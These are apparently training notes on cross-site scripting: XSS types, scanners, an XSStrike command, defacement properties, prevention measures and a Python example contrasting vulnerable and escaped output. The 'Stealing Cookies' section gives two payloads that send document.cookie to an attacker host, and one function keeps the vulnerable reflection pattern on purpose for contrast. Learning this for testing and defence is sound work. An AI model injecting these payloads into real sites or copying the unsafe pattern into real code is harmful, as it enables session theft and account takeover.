XSS

Type                        | Description
Stored (Persistent) XSS     | The most critical type of XSS, which occurs when user input is stored in the back-end database and then displayed upon retrieval (e.g., posts or comments)
Reflected (Non-Persistent)  | Occurs when user input is displayed on the page after being processed by the back-end server, but without being stored (e.g., a search result or error message)
DOM-based XSS               | Another non-persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags)

Automated Discovery

Vulnerability Scanners

  • Nessus

  • Burp Pro

  • ZAP

Other Tools

$ git clone https://github.com/s0md3v/XSStrike.git
$ cd XSStrike
$ pip install -r requirements.txt
$ python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

Manual Discovery

Defacing

  • Background Color: document.body.style.background

  • Background: document.body.background

  • Page Title: document.title

  • Page Text: DOM.innerHTML

Stealing Cookies

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

XSS Prevention

  • Input Sanitization

  • Input Validation

  • Direct input: don't use user input that writes directly to:

    • DOM.innerHTML

    • DOM.outerHTML

    • document.write()

    • document.writeln()

    • document.domain

  • Output HTML encoding on the back end, e.g. with PHP's htmlentities()

  • Server Configuration

    • Using HTTPS across the entire domain.

    • Using XSS prevention headers.

    • Using the appropriate Content-Type for the page, together with the X-Content-Type-Options: nosniff header.

    • Using Content-Security-Policy options, like script-src 'self', which only allows locally hosted scripts.

    • Using the HttpOnly and Secure cookie flags to prevent JavaScript from reading cookies and to only transmit them over HTTPS.
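The following Python example is added here and is not part of the original notes. It ties the Reflected XSS case from the type table to the prevention list: a vulnerable reflection of a query parameter sits beside its output-encoded form (html.escape is the Python counterpart of PHP's htmlentities()), an allowlist input validator covers "Input Validation", and two helpers build the server-configuration pieces (CSP, nosniff, HttpOnly/Secure cookie). The parameter name "q", the constructed sample input and the exact header values are assumptions, not something the notes specify.

```python
import html
import re

# Constructed sample input: what a user might submit in a search box (parameter "q" is an assumption).
SAMPLE_INPUT = '<script>alert(1)</script>'


def render_unsafe(user_input: str) -> str:
    """Reflected XSS pattern: the parameter is concatenated straight into the page."""
    return f"<p>Results for: {user_input}</p>"


def render_safe(user_input: str) -> str:
    """Hardened version: HTML-encode on output so markup characters become entities.

    html.escape(quote=True) encodes & < > " and ', which is enough for text placed
    inside an HTML element body or a quoted attribute value.
    """
    return f"<p>Results for: {html.escape(user_input, quote=True)}</p>"


# Allowlist validator: only accept what the field legitimately needs (here a username of
# 3-32 word characters). Rejecting unexpected input is a second layer, not a substitute
# for output encoding.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")


def validate_username(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None


def security_headers() -> dict:
    """Response headers implementing the server-configuration items from the list above.

    The CSP restricts scripts to the page's own origin; 'nosniff' stops the browser from
    re-interpreting a response as a different type; HSTS (assumed here as the way to
    enforce HTTPS across the domain) keeps later requests on HTTPS.
    """
    return {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    }


def session_cookie(name: str, value: str) -> str:
    """Set-Cookie value with the HttpOnly and Secure flags (SameSite=Lax is an added assumption)."""
    return f"{name}={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


def contains_raw_script_tag(page: str) -> bool:
    """Deliberately crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SAMPLE_INPUT))
    print("safe:  ", render_safe(SAMPLE_INPUT))
    for header, value in security_headers().items():
        print(f"{header}: {value}")
    print("Set-Cookie:", session_cookie("session", "EXAMPLE_SESSION_ID"))
```

Running it prints the unescaped page with a live script tag, the escaped page in which the same input is inert text, and the headers a hardened response would carry; the point is that encoding happens at output time, in the HTML context, regardless of what validation did earlier.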
